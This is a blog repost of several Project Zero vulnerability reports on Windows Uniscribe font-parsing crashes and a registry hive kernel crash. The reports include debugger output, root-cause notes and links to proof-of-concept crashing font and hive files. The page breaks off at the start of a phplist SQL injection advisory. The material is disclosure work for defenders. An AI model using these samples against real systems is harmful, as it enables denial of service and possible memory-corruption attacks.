Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863584431

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1027

We have encountered a crash in the Windows Uniscribe user-mode library, in an unnamed function called by USP10!ttoGetTableData, while trying to display text using a corrupted font file:

---
(46ac.5f40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0945afce ebx=00000100 ecx=09463000 edx=00000004 esi=0945afba edi=0946006b
eip=75202dae esp=0059f634 ebp=0059f668 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
USP10!ttoGetTableData+0xc4e:
75202dae 668939          mov     word ptr [ecx],di        ds:002b:09463000=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0059f668 75202bf8 0945af96 09462fb8 0059f688 USP10!ttoGetTableData+0xc4e
0059f690 752021b1 09462fb8 09462fb8 0945ad42 USP10!ttoGetTableData+0xa98
0059f6a4 751f7274 09458fd0 094589d0 0059f734 USP10!ttoGetTableData+0x51
0059f704 751f7044 0000001a 093f3d88 09401fa8 USP10!LoadTTOArabicShapeTables+0x184
0059f718 751fc638 51010f6c 093f3d88 0059f744 USP10!LoadArabicShapeTables+0xd4
0059f728 751fc5c8 51010f6c 094587d0 093e6124 USP10!ArabicSimpleLoadTbl+0x28
0059f744 751ea5a0 51010f6c 751e5348 0000001a USP10!ArabicLoadTbl+0xa8
0059f76c 751ea692 093e6124 51010f6c 0000001a USP10!UpdateCache+0xb0
0059f780 751f152d 51010f6c 093e6000 751f15db USP10!ScriptCheckCache+0x62
0059f78c 751f15db 00000001 00000001 00000000 USP10!GetShapeFunction+0xd
0059f7c4 751f2b14 00000001 00000001 0059f844 USP10!RenderItemNoFallback+0x5b
0059f7f0 751f2da2 00000001 00000001 0059f844 USP10!RenderItemWithFallback+0x104
0059f814 751f4339 00000001 0059f844 093e6124 USP10!RenderItem+0x22
0059f858 751e7a04 000004a0 00000400 51010f6c USP10!ScriptStringAnalyzeGlyphs+0x1e9
0059f870 76ca5465 51010f6c 093e6040 0000000a USP10!ScriptStringAnalyse+0x284
0059f8bc 76ca5172 51010f6c 0059fca4 0000000a LPK!LpkStringAnalyse+0xe5
0059f9b8 76ca1410 51010f6c 00000000 00000000 LPK!LpkCharsetDraw+0x332
0059f9ec 763c18b0 51010f6c 00000000 00000000 LPK!LpkDrawTextEx+0x40
0059fa2c 763c22bf 51010f6c 00000070 00000000 USER32!DT_DrawStr+0x13c
0059fa78 763c21f2 51010f6c 0059fca4 0059fcb8 USER32!DT_GetLineBreak+0x78
0059fb24 763c14d4 51010f6c 00000000 0000000a USER32!DrawTextExWorker+0x255
0059fb48 763c2475 51010f6c 0059fca4 ffffffff USER32!DrawTextExW+0x1e
0059fb7c 00336a5c 51010f6c 0059fca4 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd ecx
09463000  ???????? ???????? ???????? ????????
09463010  ???????? ???????? ???????? ????????
09463020  ???????? ???????? ???????? ????????
09463030  ???????? ???????? ???????? ????????
09463040  ???????? ???????? ???????? ????????
09463050  ???????? ???????? ???????? ????????
09463060  ???????? ???????? ???????? ????????
09463070  ???????? ???????? ???????? ????????
0:000> !heap -p -a ecx
    address 09463000 found in
    _DPH_HEAP_ROOT @ 93e1000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                 93e2fa4:          9462fb8               48 -          9462000             2000
    5e3e8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
    77580f3e ntdll!RtlDebugAllocateHeap+0x00000030
    7753ab47 ntdll!RtlpAllocateHeap+0x000000c4
    774e3431 ntdll!RtlAllocateHeap+0x0000023a
    5fcca792 vrfcore!VfCoreRtlAllocateHeap+0x00000016
    751f6644 USP10!UspAllocCache+0x00000054
    751f725b USP10!LoadTTOArabicShapeTables+0x0000016b
    751f7044 USP10!LoadArabicShapeTables+0x000000d4
    751fc638 USP10!ArabicSimpleLoadTbl+0x00000028
    751fc5c8 USP10!ArabicLoadTbl+0x000000a8
    751ea5a0 USP10!UpdateCache+0x000000b0
    751ea692 USP10!ScriptCheckCache+0x00000062
    751f152d USP10!GetShapeFunction+0x0000000d
    751f2b14 USP10!RenderItemWithFallback+0x00000104
    751f2da2 USP10!RenderItem+0x00000022
    751f4339 USP10!ScriptStringAnalyzeGlyphs+0x000001e9
    751e7a04 USP10!ScriptStringAnalyse+0x00000284
    76ca5465 LPK!LpkStringAnalyse+0x000000e5
    76ca5172 LPK!LpkCharsetDraw+0x00000332
    76ca1410 LPK!LpkDrawTextEx+0x00000040
    763c18b0 USER32!DT_DrawStr+0x0000013c
    763c22bf USER32!DT_GetLineBreak+0x00000078
    763c21f2 USER32!DrawTextExWorker+0x00000255
    763c14d4 USER32!DrawTextExW+0x0000001e
    763c2475 USER32!DrawTextW+0x0000004d
[...]
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41651.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1026&desc=2

We have encountered a crash in the Windows Uniscribe user-mode library, in the memcpy() function called by USP10!MergeLigRecords, while trying to display text using a corrupted font file:

---
(2bd0.637c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0929a000 ebx=09299fa0 ecx=00000009 edx=00000002 esi=09299fda edi=092b7914
eip=76bc9b60 esp=0015f534 ebp=0015f53c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
msvcrt!memcpy+0x5a:
76bc9b60 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> kb
ChildEBP RetAddr  Args to Child              
0015f53c 751f777d 092b7914 09299fda 00000026 msvcrt!memcpy+0x5a
0015f554 751f74e9 0928ffd0 0928f9d0 0015f5f0 USP10!MergeLigRecords+0x14d
0015f5b4 751f7044 0000001a 09223d88 09233fa8 USP10!LoadTTOArabicShapeTables+0x3f9
0015f5c8 751fc5f4 a60118b0 09223d88 09216124 USP10!LoadArabicShapeTables+0xd4
0015f5e4 751ea5a0 a60118b0 0928f7d0 0000001a USP10!ArabicLoadTbl+0xd4
0015f608 751ea692 09216124 a60118b0 0000001a USP10!UpdateCache+0xb0
0015f61c 751f152d a60118b0 09216000 751f15db USP10!ScriptCheckCache+0x62
0015f628 751f15db 00000001 00000001 092162e8 USP10!GetShapeFunction+0xd
0015f660 751f2b14 00000001 00000000 0015f6e0 USP10!RenderItemNoFallback+0x5b
0015f68c 751f2da2 00000001 00000000 0015f6e0 USP10!RenderItemWithFallback+0x104
0015f6b0 751f4339 00000000 0015f6e0 09216124 USP10!RenderItem+0x22
0015f6f4 751e7a04 000004a0 00000400 a60118b0 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0015f70c 76ca5465 a60118b0 09216040 0000000a USP10!ScriptStringAnalyse+0x284
0015f758 76ca5172 a60118b0 0015fb40 0000000a LPK!LpkStringAnalyse+0xe5
0015f854 76ca1410 a60118b0 00000000 00000000 LPK!LpkCharsetDraw+0x332
0015f888 763c18b0 a60118b0 00000000 00000000 LPK!LpkDrawTextEx+0x40
0015f8c8 763c22bf a60118b0 000000c0 00000000 USER32!DT_DrawStr+0x13c
0015f914 763c21f2 a60118b0 0015fb40 0015fb54 USER32!DT_GetLineBreak+0x78
0015f9c0 763c14d4 a60118b0 00000000 0000000a USER32!DrawTextExWorker+0x255
0015f9e4 763c2475 a60118b0 0015fb40 ffffffff USER32!DrawTextExW+0x1e
0015fa18 010e6a5c a60118b0 0015fb40 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd esi
09299fda  03e003df 03df03ea 03df0382 03df0384
09299fea  03df0388 03e0038e 03e00382 03e00384
09299ffa  03e00388 ???????? ???????? ????????
0929a00a  ???????? ???????? ???????? ????????
0929a01a  ???????? ???????? ???????? ????????
0929a02a  ???????? ???????? ???????? ????????
0929a03a  ???????? ???????? ???????? ????????
0929a04a  ???????? ???????? ???????? ????????
0:000> dd edi
092b7914  ???????? ???????? ???????? ????????
092b7924  ???????? ???????? ???????? ????????
092b7934  ???????? ???????? ???????? ????????
092b7944  ???????? ???????? ???????? ????????
092b7954  ???????? ???????? ???????? ????????
092b7964  ???????? ???????? ???????? ????????
092b7974  ???????? ???????? ???????? ????????
092b7984  ???????? ???????? ???????? ????????
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is a proof of concept malformed font file which triggers the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41650.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1025

We have encountered a crash in the Windows Uniscribe user-mode library, in the memset() function called by USP10!otlCacheManager::GlyphsSubstituted, while trying to display text using a corrupted font file:

---
(449c.6338): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=092ac250 ebx=092ac230 ecx=00000784 edx=00000074 esi=0028ea6c edi=092affd0
eip=76bc9c8d esp=0028e978 ebp=0028e97c iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
msvcrt!_VEC_memcpy+0x116:
76bc9c8d 660f7f4730      movdqa  xmmword ptr [edi+30h],xmm0 ds:002b:092b0000=????????????????????????????????
0:000> kb
ChildEBP RetAddr  Args to Child              
0028e97c 76bc9c39 092ac250 0003ff80 00000006 msvcrt!_VEC_memcpy+0x116
0028e99c 76bc9cde 092ac250 00000000 0003fff4 msvcrt!_VEC_memzero+0x36
0028e9c0 75234b58 092ac248 00000000 0003fffc msvcrt!_VEC_memzero+0x82
0028e9e0 752336a1 0028ed18 00000006 0000ffff USP10!otlCacheManager::GlyphsSubstituted+0xc8
0028ebc0 7522f29f 42555347 0028ed58 0028ece4 USP10!ApplyFeatures+0x541
0028ec0c 7522b083 00000000 092c6ffc 092c6e18 USP10!SubstituteOtlGlyphs+0x1bf
0028ec38 75223921 0028ecb4 0028ed0c 0028ed58 USP10!ShapingLibraryInternal::SubstituteOtlGlyphsWithLanguageFallback+0x23
0028eed0 7521548a 0028efdc 0028f008 0028eff0 USP10!ArabicEngineGetGlyphs+0x891
0028ef90 7521253f 0028efdc 0028f008 0028eff0 USP10!ShapingGetGlyphs+0x36a
0028f078 751e5c6f 2a0123f2 092a6124 092a6318 USP10!ShlShape+0x2ef
0028f0bc 751f167a 2a0123f2 092a6124 092a6318 USP10!ScriptShape+0x15f
0028f11c 751f2b14 00000000 00000000 0028f19c USP10!RenderItemNoFallback+0xfa
0028f148 751f2da2 00000000 00000000 0028f19c USP10!RenderItemWithFallback+0x104
0028f16c 751f4339 00000000 0028f19c 092a6124 USP10!RenderItem+0x22
0028f1b0 751e7a04 000004a0 00000400 2a0123f2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0028f1c8 76ca5465 2a0123f2 092a6040 0000000a USP10!ScriptStringAnalyse+0x284
0028f214 76ca5172 2a0123f2 0028f5fc 0000000a LPK!LpkStringAnalyse+0xe5
0028f310 76ca1410 2a0123f2 00000000 00000000 LPK!LpkCharsetDraw+0x332
0028f344 763c18b0 2a0123f2 00000000 00000000 LPK!LpkDrawTextEx+0x40
0028f384 763c22bf 2a0123f2 00000070 00000000 USER32!DT_DrawStr+0x13c
0028f3d0 763c21f2 2a0123f2 0028f5fc 0028f610 USER32!DT_GetLineBreak+0x78
0028f47c 763c14d4 2a0123f2 00000000 0000000a USER32!DrawTextExWorker+0x255
0028f4a0 763c2475 2a0123f2 0028f5fc ffffffff USER32!DrawTextExW+0x1e
0028f4d4 01336a5c 2a0123f2 0028f5fc ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd edi
092affd0  00000000 00000000 00000000 00000000
092affe0  00000000 00000000 00000000 00000000
092afff0  00000000 00000000 00000000 00000000
092b0000  ???????? ???????? ???????? ????????
092b0010  ???????? ???????? ???????? ????????
092b0020  ???????? ???????? ???????? ????????
092b0030  ???????? ???????? ???????? ????????
092b0040  ???????? ???????? ???????? ????????
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 2 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41649.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1023

We have encountered a crash in the Windows Uniscribe user-mode library, in the USP10!AssignGlyphTypes function, while trying to display text using a corrupted font file:

---
(58d0.5ae4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0042f2cc ebx=00000001 ecx=00000091 edx=00000091 esi=095c0004 edi=000007e1
eip=75235699 esp=0042ef8c ebp=0042ef98 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
USP10!AssignGlyphTypes+0x79:
75235699 0fb70e          movzx   ecx,word ptr [esi]       ds:002b:095c0004=????
0:000> kb
ChildEBP RetAddr  Args to Child              
0042ef98 75233660 0042f2cc 095dfc86 0000f81e USP10!AssignGlyphTypes+0x79
0042f17c 7522f29f 42555347 0042f2e4 0042f2a8 USP10!ApplyFeatures+0x500
0042f1c8 7522f710 00000000 095e0000 095dfc78 USP10!SubstituteOtlGlyphs+0x1bf
0042f204 752213c0 0042f280 0042f2b8 0042f2e4 USP10!SubstituteOtlChars+0x220
0042f480 7521548a 0042f58c 0042f5b8 0042f5a0 USP10!HebrewEngineGetGlyphs+0x690
0042f540 7521253f 0042f58c 0042f5b8 0042f5a0 USP10!ShapingGetGlyphs+0x36a
0042f628 751e5c6f 1b01233b 095b6124 095b6318 USP10!ShlShape+0x2ef
0042f66c 751f167a 1b01233b 095b6124 095b6318 USP10!ScriptShape+0x15f
0042f6cc 751f2b14 00000000 00000000 0042f74c USP10!RenderItemNoFallback+0xfa
0042f6f8 751f2da2 00000000 00000000 0042f74c USP10!RenderItemWithFallback+0x104
0042f71c 751f4339 00000000 0042f74c 095b6124 USP10!RenderItem+0x22
0042f760 751e7a04 000004a0 00000400 1b01233b USP10!ScriptStringAnalyzeGlyphs+0x1e9
0042f778 76ca5465 1b01233b 095b6040 0000000a USP10!ScriptStringAnalyse+0x284
0042f7c4 76ca5172 1b01233b 0042fbac 0000000a LPK!LpkStringAnalyse+0xe5
0042f8c0 76ca1410 1b01233b 00000000 00000000 LPK!LpkCharsetDraw+0x332
0042f8f4 763c18b0 1b01233b 00000000 00000000 LPK!LpkDrawTextEx+0x40
0042f934 763c22bf 1b01233b 000000b0 00000000 USER32!DT_DrawStr+0x13c
0042f980 763c21f2 1b01233b 0042fbac 0042fbc0 USER32!DT_GetLineBreak+0x78
0042fa2c 763c14d4 1b01233b 00000000 0000000a USER32!DrawTextExWorker+0x255
0042fa50 763c2475 1b01233b 0042fbac ffffffff USER32!DrawTextExW+0x1e
0042fa84 013b6a5c 1b01233b 0042fbac ffffffff USER32!DrawTextW+0x4d
[...]
0:000> u
USP10!AssignGlyphTypes+0x79:
75235699 0fb70e          movzx   ecx,word ptr [esi]
7523569c b8f0ff0000      mov     eax,0FFF0h
752356a1 66214602        and     word ptr [esi+2],ax
752356a5 51              push    ecx
752356a6 8d4d0c          lea     ecx,[ebp+0Ch]
752356a9 e852420000      call    USP10!otlClassDef::getClass (75239900)
752356ae 66094602        or      word ptr [esi+2],ax
752356b2 eb09            jmp     USP10!AssignGlyphTypes+0x9d (752356bd)
0:000> dd esi
095c0004  ???????? ???????? ???????? ????????
095c0014  ???????? ???????? ???????? ????????
095c0024  ???????? ???????? ???????? ????????
095c0034  ???????? ???????? ???????? ????????
095c0044  ???????? ???????? ???????? ????????
095c0054  ???????? ???????? ???????? ????????
095c0064  ???????? ???????? ???????? ????????
095c0074  ???????? ???????? ???????? ????????
---

While the immediate crash is caused by an invalid memory read operation, the function subsequently writes to the out-of-bounds memory regions at addresses 0x752356a1 and 0x752356ae, leading to memory corruption and potential remote code execution.

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41648.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1022

We have encountered a crash in the Windows Uniscribe user-mode library, in the memmove() function called by USP10!otlList::insertAt, while trying to display text using a corrupted font file:

---
(4b44.24a8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=093bc154 ebx=0943c104 ecx=00000012 edx=00000000 esi=093bc10c edi=0943c104
eip=76bc9f40 esp=001ee9b4 ebp=001ee9bc iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
msvcrt!memmove+0x5a:
76bc9f40 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]
0:000> kb
ChildEBP RetAddr  Args to Child              
001ee9bc 7522e87a 0943c104 093bc10c 00000048 msvcrt!memmove+0x5a
001ee9dc 752358bd 00000002 ffffffff 00000001 USP10!otlList::insertAt+0x3a
001ee9f8 7523a414 001eee10 001eee34 00000002 USP10!InsertGlyphs+0x1d
001eea3c 75239676 001eee10 001eee34 001eed24 USP10!SubstituteNtoM+0x224
001eea7c 75231393 001eee10 001eee34 001eed24 USP10!otlMultiSubstLookup::apply+0xf6
001eeae0 752335e1 00000000 001eee10 001eee34 USP10!ApplyLookup+0x183
001eece4 7522f29f 42555347 001eee4c 001eee10 USP10!ApplyFeatures+0x481
001eed30 7522f710 00000000 093da000 093d9b58 USP10!SubstituteOtlGlyphs+0x1bf
001eed6c 752213c0 001eede8 001eee20 001eee4c USP10!SubstituteOtlChars+0x220
001eefe8 7521548a 001ef0f4 001ef120 001ef108 USP10!HebrewEngineGetGlyphs+0x690
001ef0a8 7521253f 001ef0f4 001ef120 001ef108 USP10!ShapingGetGlyphs+0x36a
001ef190 751e5c6f 86011dce 093b6124 093b6318 USP10!ShlShape+0x2ef
001ef1d4 751f167a 86011dce 093b6124 093b6318 USP10!ScriptShape+0x15f
001ef234 751f2b14 00000000 00000000 001ef2b4 USP10!RenderItemNoFallback+0xfa
001ef260 751f2da2 00000000 00000000 001ef2b4 USP10!RenderItemWithFallback+0x104
001ef284 751f4339 00000000 001ef2b4 093b6124 USP10!RenderItem+0x22
001ef2c8 751e7a04 000004a0 00000400 86011dce USP10!ScriptStringAnalyzeGlyphs+0x1e9
001ef2e0 76ca5465 86011dce 093b6040 0000000a USP10!ScriptStringAnalyse+0x284
001ef32c 76ca5172 86011dce 001ef714 0000000a LPK!LpkStringAnalyse+0xe5
001ef428 76ca1410 86011dce 00000000 00000000 LPK!LpkCharsetDraw+0x332
001ef45c 763c18b0 86011dce 00000000 00000000 LPK!LpkDrawTextEx+0x40
001ef49c 763c22bf 86011dce 00000058 00000000 USER32!DT_DrawStr+0x13c
001ef4e8 763c21f2 86011dce 001ef714 001ef728 USER32!DT_GetLineBreak+0x78
001ef594 763c14d4 86011dce 00000000 0000000a USER32!DrawTextExWorker+0x255
001ef5b8 763c2475 86011dce 001ef714 ffffffff USER32!DrawTextExW+0x1e
001ef5ec 013abcec 86011dce 001ef714 ffffffff USER32!DrawTextW+0x4d
[...]
0:000> dd esi
093bc10c  00000b45 00010001 00000b46 00010002
093bc11c  00000b47 00010003 00000b48 00010004
093bc12c  00000b49 00010005 00000b4a 00010006
093bc13c  00000b4b 00010007 00000b4c 00010008
093bc14c  00000b4d 00010009 000b0000 67696c63
093bc15c  00000001 000b0000 00000001 000000f8
093bc16c  00000048 001104bd 00010000 00000b26
093bc17c  00010001 00000b27 00010002 00000b28
0:000> dd edi
0943c104  ???????? ???????? ???????? ????????
0943c114  ???????? ???????? ???????? ????????
0943c124  ???????? ???????? ???????? ????????
0943c134  ???????? ???????? ???????? ????????
0943c144  ???????? ???????? ???????? ????????
0943c154  ???????? ???????? ???????? ????????
0943c164  ???????? ???????? ???????? ????????
0943c174  ???????? ???????? ???????? ????????
---

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with 3 crashing samples.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41647.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1019

We have encountered a crash in the Windows Uniscribe user-mode library, in the usp10!otlChainRuleSetTable::rule function, while trying to display text using a corrupted TTF font file:

---
(4464.11b4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0933d8bf ebx=00000000 ecx=09340ffc edx=00001b9f esi=0026ecac edi=00000009
eip=752378f3 esp=0026ec24 ebp=0026ec2c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
USP10!ScriptPositionSingleGlyph+0x28533:
752378f3 668b4c5002      mov     cx,word ptr [eax+edx*2+2] ds:002b:09340fff=????

0:000> kb
ChildEBP RetAddr  Args to Child              
0026ec2c 752382f3 0026ecac 00001b9f 09340ffc USP10!otlChainRuleSetTable::rule+0x13
0026eccc 75231471 42555347 0026f078 0133d7d2 USP10!otlChainingLookup::apply+0x7d3
0026ed48 752335e1 000000e4 0026f078 0026f09c USP10!ApplyLookup+0x261
0026ef4c 7522f29f 42555347 0026f0b4 0026f078 USP10!ApplyFeatures+0x481
0026ef98 7522f710 00000000 09342ffa 09342f40 USP10!SubstituteOtlGlyphs+0x1bf
0026efd4 752213c0 0026f050 0026f088 0026f0b4 USP10!SubstituteOtlChars+0x220
0026f250 7521548a 0026f35c 0026f388 0026f370 USP10!HebrewEngineGetGlyphs+0x690
0026f310 7521253f 0026f35c 0026f388 0026f370 USP10!ShapingGetGlyphs+0x36a
0026f3fc 751e5c6f 2d011da2 09316124 09316318 USP10!ShlShape+0x2ef
0026f440 751f167a 2d011da2 09316124 09316318 USP10!ScriptShape+0x15f
0026f4a0 751f2b14 00000000 00000000 0026f520 USP10!RenderItemNoFallback+0xfa
0026f4cc 751f2da2 00000000 00000000 0026f520 USP10!RenderItemWithFallback+0x104
0026f4f0 751f4339 00000000 0026f520 09316124 USP10!RenderItem+0x22
0026f534 751e7a04 000004a0 00000400 2d011da2 USP10!ScriptStringAnalyzeGlyphs+0x1e9
0026f54c 76ca5465 2d011da2 09316040 0000000a USP10!ScriptStringAnalyse+0x284
0026f598 76ca5172 2d011da2 0026fa1c 0000000a LPK!LpkStringAnalyse+0xe5
0026f694 76ca1410 2d011da2 00000000 00000000 LPK!LpkCharsetDraw+0x332
0026f6c8 763c18b0 2d011da2 00000000 00000000 LPK!LpkDrawTextEx+0x40
0026f708 763c22bf 2d011da2 00000048 00000000 USER32!DT_DrawStr+0x13c
0026f754 763c21f2 2d011da2 0026fa1c 0026fa30 USER32!DT_GetLineBreak+0x78
0026f800 763c14d4 2d011da2 00000000 0000000a USER32!DrawTextExWorker+0x255
0026f824 763c2475 2d011da2 0026fa1c ffffffff USER32!DrawTextExW+0x1e
[...]
---

The crash is caused by a single-byte change in a legitimate font file: at offset 0x845A, byte 0x00 is changed to 0xFF. The data region corresponds to the "GSUB" sfnt table. The change causes the otlChainRuleTable::backtrackGlyphCount() function to return an overly large 16-bit integer of 0xED00, which is then used as the number of iterations in a subsequent loop in the otlChainingLookup::apply() function, without prior validation. Increasing (out-of-bounds) indexes are then passed to otlChainRuleSetTable::rule() in the 2nd parameter, and used to address an array of 16-bit indexes. This is where the crash takes place, as the large index eventually starts pointing into the boundary of the last mapped heap memory page.

The 16-bit value being read from outside the allocated buffer is later used as yet another index, used to address some an array in the otlChainRuleTable::otlChainRuleTable() routine. While the function only appears to read from the newly formed pointer at first glance, we are not ruling out the possibility of memory corruption. In a read-only scenario, the issue could be potentially used to disclose sensitive data from the process heap.

The issue reproduces on Windows 7. It is easiest to reproduce with PageHeap enabled, but it is also possible to observe a crash in a default system configuration. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.

Attached is an archive with the original and modified TTF files.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41646.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=993

We have encountered Windows kernel crashes in the internal nt!nt!HvpGetBinMemAlloc and nt!ExpFindAndRemoveTagBigPages functions while loading corrupted registry hive files. We believe both crashes to be caused by the same bug. Examples of crash log excerpts generated after triggering the bug are shown below:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except.
Typically the address is just plain bad or it is pointing at freed memory.
Arguments:
Arg1: a2b23004, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 817f7f04, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

[...]

STACK_TEXT:  
a3c0b70c 818b68d0 a06529c8 a0652fd8 a06529c8 nt!HvpGetBinMemAlloc+0x8
a3c0b73c 817f113e 00000001 80000580 80000578 nt!HvFreeHive+0x11c
a3c0b798 817c4fac a3c0b828 00000002 00000000 nt!CmpInitializeHive+0x5e6
a3c0b85c 817c5d91 a3c0bbb8 00000000 a3c0b9f4 nt!CmpInitHiveFromFile+0x1be
a3c0b9c0 817cdaba a3c0bbb8 a3c0ba88 a3c0ba0c nt!CmpCmdHiveOpen+0x50
a3c0bacc 817c63c4 a3c0bb90 a3c0bbb8 00000010 nt!CmLoadKey+0x459
a3c0bc0c 8165cdb6 002efa0c 00000000 00000010 nt!NtLoadKeyEx+0x56c
a3c0bc0c 77796c74 002efa0c 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
002efa74 00000000 00000000 00000000 00000000 0x77796c74
---

and

---
BAD_POOL_HEADER (19)
The pool is already corrupt at the time of the current request.
This may or may not be due to the caller.
The internal pool links must be walked to figure out a possible cause of
the problem, and then special pool applied to the suspect tags or the driver
verifier to a suspect driver.
Arguments:
Arg1: 00000022, 
Arg2: a9c14000
Arg3: 00000001
Arg4: 00000000

[...]

STACK_TEXT:  
a353b688 81760bf9 a9c14000 a353b6c0 a353b6b4 nt!ExpFindAndRemoveTagBigPages+0x1fd
a353b6f8 8184d349 a9c14000 00000000 a353b73c nt!ExFreePoolWithTag+0x13f
a353b708 818d48d9 a9c14000 00001000 a87bcfd8 nt!CmpFree+0x17
a353b73c 8180f13e 00000001 80000560 80000548 nt!HvFreeHive+0x125
a353b798 817e2fac a353b828 00000002 00000000 nt!CmpInitializeHive+0x5e6
a353b85c 817e3d91 a353bbb8 00000000 a353b9f4 nt!CmpInitHiveFromFile+0x1be
a353b9c0 817ebaba a353bbb8 a353ba88 a353ba0c nt!CmpCmdHiveOpen+0x50
a353bacc 817e43c4 a353bb90 a353bbb8 00000010 nt!CmLoadKey+0x459
a353bc0c 8167adb6 002bf614 00000000 00000010 nt!NtLoadKeyEx+0x56c
a353bc0c 77a36c74 002bf614 00000000 00000010 nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
002bf67c 00000000 00000000 00000000 00000000 0x77a36c74
---

The issue reproduces on Windows 7 32- and 64-bit, and manifests itself both with and without Special Pools (but it is still advised to have the mechanism enabled). In order to reproduce the problem with the provided samples, it is necessary to load them with a dedicated program which calls the RegLoadAppKey() API.

The root cause of the crashes is unknown. It must be noted that in our test environment, reproduction has been very unreliable: the same hive could crash the system in one run, and then parse fine (or fail with an error) in 10 subsequent runs. In order to facilitate reproduction, I'm providing a high number of testcases which were seen to cause a bugcheck once or more, in hope that at least one of them will also reproduce externally.

################################################################################

On November 29, MSRC let us know that they were unable to reproduce a crash with the provided samples and report, and asked for more information and/or kernel crash dumps.

One day later, we've looked into the bug again and discovered that it wasn't sufficient to just load a single corrupted hive to trigger the bugcheck: instead, it is necessary to sequentially load several corrupted hives from the same path in the filesystem. MSRC confirmed that they could reliably reproduce the problem with this new information.

Since the additional detail is crucial to observe the symptoms of the bug and it was not included in the original report, I'm resetting the "Reported" date to November 30.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41645.zip
HireHackking 
1. Introduction

Affected Product:	phplist 3.2.6
Fixed in:	3.3.1
Fixed Version Link:	https://sourceforge.net/projects/phplist/files/phplist/3.3.1/phplist-3.3.1.zip/download
Vendor Website:	https://www.phplist.org/
Vulnerability Type:	SQL Injection
Remote Exploitable:	Yes
Reported to vendor:	01/10/2017
